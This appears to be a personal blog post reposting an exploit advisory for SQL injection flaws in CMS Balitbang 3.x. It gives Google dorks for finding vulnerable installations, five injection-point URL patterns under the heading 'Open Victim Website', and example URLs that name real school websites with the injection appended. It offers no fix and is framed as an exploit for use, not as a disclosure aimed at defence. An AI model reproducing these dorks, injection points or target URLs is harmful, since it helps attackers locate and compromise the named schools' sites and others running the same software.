.: Dee Personal Blog :.

Subtitle

Blog

CMS Balitbang 3.x SQL Injection Vulnerability

Posted by Root on November 21, 2011 at 12:10 PM

 

=========================================================================

CMS Balitbang 3.x SQL Injection Vulnerability

=========================================================================

 

:-------------------------------------------------------------------------------------------------------------------------:

: # Exploit Title : CMS Balitbang 3.x SQL Injection Vulnerability

: # Date : 21 November 2011

: # Author : X-Cisadane

: # Software Link : http://www.kajianwebsite.org/html/index.php

: # Version : 3.x

: # Category : Web Applications

: # Vulnerability : SQL Injection

: # Tested On : Google Chrome 14.0.835 (Windows)

: # Dorks : inurl:alumni.php?id=data&tahun&hal= OR inurl:index.php?id=lih_buku&hal=

: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari

:-------------------------------------------------------------------------------------------------------------------------:

 


POC :

 

SQL Injection Vulnerability :

- Open Victim Website : http:////alumni.php?id=data&tahun&hal='[SQL]

- Open Victim Website : http:////index.php?id=lih_buku&hal='[SQL]

- Open Victim Website : http:////index.php?id=artikel&hal='[SQL]

- Open Victim Website : http:////index.php?id=album&hal='[SQL]

- Open Victim Website : http:////index.php?id=berita&hal='[SQL]

 


Example :

http://www.sman1kotabaru.sch.id/html/alumni.php?id=data&tahun&hal='2

http://www.kajianwebsite.org/html/index.php?id=lih_buku&hal='2

http://www.sman3kotasukabumi.sch.id/html/index.php?id=artikel&hal='1

http://smpn6banjarmasin.sch.id/html/index.php?id=album&hal='2

http://sman7-bpp.sch.id/html/index.php?id=berita&hal='1

Categories: Exploit

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

Already a member? Sign In

0 Comments